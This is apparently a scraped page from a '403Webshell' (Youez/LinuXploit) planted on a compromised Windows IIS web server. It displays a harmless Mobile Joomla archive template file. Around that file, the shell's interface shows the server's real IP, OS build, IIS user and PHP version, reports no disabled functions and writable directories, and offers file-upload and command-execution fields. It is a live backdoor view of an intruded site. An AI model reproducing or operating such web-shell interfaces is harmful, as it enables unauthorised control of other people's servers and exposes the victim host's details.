403Webshell
Server IP : 195.130.67.5  /  Your IP : 216.73.217.154
Web Server : Microsoft-IIS/10.0
System : Windows NT WEBSERVER1 10.0 build 17763 (Windows Server 2016) i586
User : IUSR ( 0)
PHP Version : 7.4.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/icd/templates/mobile_imode/html/com_content/archive/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/inetpub/wwwroot/icd/templates/mobile_imode/html/com_content/archive/default_items.php
<?php
/**
 * Mobile Joomla!
 * http://www.mobilejoomla.com
 *
 * @version		0.9.7
 * @license		http://www.gnu.org/licenses/gpl-2.0.htm GNU/GPL
 * @copyright	(C) 2008-2010 MobileJoomla!
 * @date		August 2010
 */
defined('_JEXEC') or die('Restricted access'); ?>
<ul id="archive-list" style="list-style: none;">
<?php foreach ($this->items as $item) : ?>
<li class="row<?php echo ($item->odd +1 ); ?>">
<h4 class="contentheading">
<a href="<?php echo JRoute::_(ContentHelperRoute::getArticleRoute($item->slug)); ?>"><?php echo $this->escape($item->title); ?></a></h4>
<?php if (($this->params->get('show_section') && $item->sectionid) || ($this->params->get('show_category') && $item->catid)) : ?>
<div>
<?php if ($this->params->get('show_section') && $item->sectionid && isset($item->section)) : ?>
<span>
<?php if ($this->params->get('link_section')) : ?><?php echo '<a href="'.JRoute::_(ContentHelperRoute::getSectionRoute($item->sectionid)).'">'; ?><?php endif; ?>
<?php echo $item->section; ?>
<?php if ($this->params->get('link_section')) : ?><?php echo '</a>'; ?><?php endif; ?>
<?php if ($this->params->get('show_category')) : ?><?php echo ' - '; ?><?php endif; ?>
</span>
<?php endif; ?>
<?php if ($this->params->get('show_category') && $item->catid) : ?>
<span>
<?php if ($this->params->get('link_category')) : ?><?php echo '<a href="'.JRoute::_(ContentHelperRoute::getCategoryRoute($item->catslug, $item->sectionid)).'">'; ?><?php endif; ?>
<?php echo $item->category; ?>
<?php if ($this->params->get('link_category')) : ?><?php echo '</a>'; ?><?php endif; ?>
</span>
<?php endif; ?>
</div>
<?php endif; ?>
<h5 class="metadata">
<?php if ($this->params->get('show_create_date')) : ?>
<span class="created-date"><?php echo JText::_('Created') .': '.  JHTML::_( 'date', $item->created, JText::_('DATE_FORMAT_LC2')) ?></span>
<?php endif; ?>
<?php if ($this->params->get('show_author')) : ?>
<span class="author"><?php echo JText::_('Author').': '; echo $item->created_by_alias ? $item->created_by_alias : $item->author; ?></span>
<?php endif; ?>
</h5>
<div class="intro"><?php echo JString::substr(strip_tags($item->introtext), 0, 255);  ?>...</div>
</li>
<?php endforeach; ?>
</ul>
<div id="navigation">
<span><?php echo $this->pagination->getPagesLinks(); ?></span>
<span><?php echo $this->pagination->getPagesCounter(); ?></span>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit